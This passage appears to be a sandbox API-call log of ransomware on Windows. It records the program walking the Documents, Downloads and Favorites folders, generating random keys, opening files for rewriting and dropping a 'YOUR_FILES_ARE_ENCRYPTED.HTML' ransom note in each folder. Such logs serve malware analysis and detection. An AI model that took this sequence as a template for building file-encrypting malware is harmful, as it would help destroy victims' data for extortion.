param_1=0x19ed4a, param_2="%02X" | out: param_1="9F") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="8B") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="DF") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="E1") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="F6") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="71") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="B3") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="21") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="A3") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="7A") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="F1") returned 2 [0124.508] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="60") returned 2 [0124.508] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\usHRYk9e1W9-.xlsx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\usHRYk9e1W9-.xlsx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\usHRYk9e1W9-.xlsx" [0124.509] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.509] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.513] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa06de40, ftCreationTime.dwHighDateTime=0x1d707b9, ftLastAccessTime.dwLowDateTime=0xa7a8e590, ftLastAccessTime.dwHighDateTime=0x1d70970, ftLastWriteTime.dwLowDateTime=0xa7a8e590, ftLastWriteTime.dwHighDateTime=0x1d70970, nFileSizeHigh=0x0, nFileSizeLow=0x10f32, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="vLdW93 fNOkKleU.xls", cAlternateFileName="VLDW93~1.XLS")) returned 1 [0124.516] StrStrIW (lpFirst="vLdW93 fNOkKleU.xls", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.516] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\vLdW93 fNOkKleU.xls") returned 55 [0124.516] PathFindExtensionW (pszPath="vLdW93 fNOkKleU.xls") returned=".xls" [0124.516] lstrlenW (lpString=".xls") returned 4 [0124.516] PathFindExtensionW (pszPath="vLdW93 fNOkKleU.xls") returned=".xls" [0124.516] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\vLdW93 fNOkKleU.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\vldw93 fnokkleu.xls"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.517] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=69426) returned 1 [0124.517] GetProcessHeap () returned 0x600000 [0124.517] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.519] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="B1") returned 2 [0124.520] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="BC") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="1E") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="D2") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="39") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="DB") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="79") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="D6") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="D0") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="5A") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="B5") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="DC") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="3C") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="44") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="7F") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="5E") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="F5") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="B4") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="AB") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="0E") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="82") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="57") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="08") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="25") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="21") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="F8") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="28") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="A1") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="8C") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="30") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="CB") returned 2 [0124.520] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="46") returned 2 [0124.521] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\vLdW93 fNOkKleU.xls" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\vLdW93 fNOkKleU.xls") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\vLdW93 fNOkKleU.xls" [0124.521] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.521] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.524] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3afd2130, ftCreationTime.dwHighDateTime=0x1d6b09d, ftLastAccessTime.dwLowDateTime=0x61e700a0, ftLastAccessTime.dwHighDateTime=0x1d6fb51, ftLastWriteTime.dwLowDateTime=0x61e700a0, ftLastWriteTime.dwHighDateTime=0x1d6fb51, nFileSizeHigh=0x0, nFileSizeLow=0xf466, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="wDe6fS7L7h.pptx", cAlternateFileName="WDE6FS~1.PPT")) returned 1 [0124.524] StrStrIW (lpFirst="wDe6fS7L7h.pptx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.524] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\wDe6fS7L7h.pptx") returned 51 [0124.525] PathFindExtensionW (pszPath="wDe6fS7L7h.pptx") returned=".pptx" [0124.525] lstrlenW (lpString=".pptx") returned 5 [0124.525] PathFindExtensionW (pszPath="wDe6fS7L7h.pptx") returned=".pptx" [0124.525] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\wDe6fS7L7h.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\wde6fs7l7h.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.525] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=62566) returned 1 [0124.525] GetProcessHeap () returned 0x600000 [0124.525] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0124.526] wsprintfW (in: param_1=0x19ecfa, param_2="%02X" | out: param_1="A8") returned 2 [0124.526] wsprintfW (in: param_1=0x19ecfe, param_2="%02X" | out: param_1="1C") returned 2 [0124.526] wsprintfW (in: param_1=0x19ed02, param_2="%02X" | out: param_1="98") returned 2 [0124.526] wsprintfW (in: param_1=0x19ed06, param_2="%02X" | out: param_1="EF") returned 2 [0124.526] wsprintfW (in: param_1=0x19ed0a, param_2="%02X" | out: param_1="13") returned 2 [0124.526] wsprintfW (in: param_1=0x19ed0e, param_2="%02X" | out: param_1="A9") returned 2 [0124.526] wsprintfW (in: param_1=0x19ed12, param_2="%02X" | out: param_1="8B") returned 2 [0124.526] wsprintfW (in: param_1=0x19ed16, param_2="%02X" | out: param_1="E3") returned 2 [0124.526] wsprintfW (in: param_1=0x19ed1a, param_2="%02X" | out: param_1="BE") returned 2 [0124.526] wsprintfW (in: param_1=0x19ed1e, param_2="%02X" | out: param_1="84") returned 2 [0124.526] wsprintfW (in: param_1=0x19ed22, param_2="%02X" | out: param_1="C4") returned 2 [0124.526] wsprintfW (in: param_1=0x19ed26, param_2="%02X" | out: param_1="D7") returned 2 [0124.526] wsprintfW (in: param_1=0x19ed2a, param_2="%02X" | out: param_1="04") returned 2 [0124.526] wsprintfW (in: param_1=0x19ed2e, param_2="%02X" | out: param_1="DB") returned 2 [0124.526] wsprintfW (in: param_1=0x19ed32, param_2="%02X" | out: param_1="B1") returned 2 [0124.526] wsprintfW (in: param_1=0x19ed36, param_2="%02X" | out: param_1="A2") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed3a, param_2="%02X" | out: param_1="D4") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed3e, param_2="%02X" | out: param_1="42") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed42, param_2="%02X" | out: param_1="B5") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed46, param_2="%02X" | out: param_1="94") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed4a, param_2="%02X" | out: param_1="8C") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed4e, param_2="%02X" | out: param_1="95") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed52, param_2="%02X" | out: param_1="8D") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed56, param_2="%02X" | out: param_1="B8") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed5a, param_2="%02X" | out: param_1="0F") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed5e, param_2="%02X" | out: param_1="B7") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed62, param_2="%02X" | out: param_1="E3") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed66, param_2="%02X" | out: param_1="87") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed6a, param_2="%02X" | out: param_1="14") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed6e, param_2="%02X" | out: param_1="73") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed72, param_2="%02X" | out: param_1="FF") returned 2 [0124.527] wsprintfW (in: param_1=0x19ed76, param_2="%02X" | out: param_1="77") returned 2 [0124.527] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\wDe6fS7L7h.pptx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\wDe6fS7L7h.pptx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\wDe6fS7L7h.pptx" [0124.527] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0124.527] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0124.531] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3afd2130, ftCreationTime.dwHighDateTime=0x1d6b09d, ftLastAccessTime.dwLowDateTime=0x61e700a0, ftLastAccessTime.dwHighDateTime=0x1d6fb51, ftLastWriteTime.dwLowDateTime=0x61e700a0, ftLastWriteTime.dwHighDateTime=0x1d6fb51, nFileSizeHigh=0x0, nFileSizeLow=0xf466, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="wDe6fS7L7h.pptx", cAlternateFileName="WDE6FS~1.PPT")) returned 0 [0124.531] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0124.531] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0124.531] GetProcessHeap () returned 0x600000 [0124.531] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0124.532] WriteFile (in: hFile=0x314, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0124.533] CloseHandle (hObject=0x314) returned 1 [0124.533] GetProcessHeap () returned 0x600000 [0124.533] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.533] GetProcessHeap () returned 0x600000 [0124.533] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0124.535] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0124.535] StrStrIW (lpFirst="Downloads", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.535] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Downloads") returned 35 [0124.535] GetProcessHeap () returned 0x600000 [0124.535] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0124.535] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Downloads" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Downloads") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Downloads" [0124.535] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Downloads", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Downloads\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Downloads\\*" [0124.536] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Downloads\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0124.536] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="..", cAlternateFileName="")) returned 1 [0124.536] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x436bc315, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0124.536] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.536] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini") returned 47 [0124.536] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0124.536] lstrlenW (lpString=".ini") returned 4 [0124.536] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0124.536] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Downloads\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\downloads\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.537] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=282) returned 1 [0124.537] CloseHandle (hObject=0x328) returned 1 [0124.537] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x436bc315, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0124.537] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0124.537] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0124.537] GetProcessHeap () returned 0x600000 [0124.537] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3155038 [0124.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\downloads\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0124.538] WriteFile (in: hFile=0x314, lpBuffer=0x3155038*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x3155038*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0124.540] CloseHandle (hObject=0x314) returned 1 [0124.540] GetProcessHeap () returned 0x600000 [0124.540] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3155038 | out: hHeap=0x600000) returned 1 [0124.540] GetProcessHeap () returned 0x600000 [0124.540] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0124.540] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0124.540] StrStrIW (lpFirst="Favorites", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.540] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites") returned 35 [0124.540] GetProcessHeap () returned 0x600000 [0124.540] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0124.540] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites" [0124.540] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\*" [0124.540] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName=".", cAlternateFileName="")) returned 0x626738 [0124.540] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="..", cAlternateFileName="")) returned 1 [0124.540] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43053b43, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43053b43, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="Bing.url", cAlternateFileName="")) returned 1 [0124.540] StrStrIW (lpFirst="Bing.url", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.540] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url") returned 44 [0124.540] PathFindExtensionW (pszPath="Bing.url") returned=".url" [0124.541] lstrlenW (lpString=".url") returned 4 [0124.541] PathFindExtensionW (pszPath="Bing.url") returned=".url" [0124.541] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\Bing.url" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\bing.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.541] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=208) returned 1 [0124.541] CloseHandle (hObject=0x328) returned 1 [0124.541] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x6265b8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0124.541] StrStrIW (lpFirst="desktop.ini", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0124.541] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini") returned 47 [0124.541] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0124.541] lstrlenW (lpString=".ini") returned 4 [0124.541] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0124.541] SystemFunction036 (in: RandomBuffer=0x19edbc, RandomBufferLength=0x20 | out: RandomBuffer=0x19edbc) returned 1 [0124.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Favorites\\desktop.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0124.542] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19ede0 | out: lpFileSize=0x19ede0*=402) returned 1 [0124.542] CloseHandle 